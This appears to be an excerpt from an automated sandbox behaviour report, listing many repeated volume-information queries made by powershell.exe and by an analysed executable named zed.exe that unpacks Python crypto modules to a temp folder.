Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformationJump to behavior
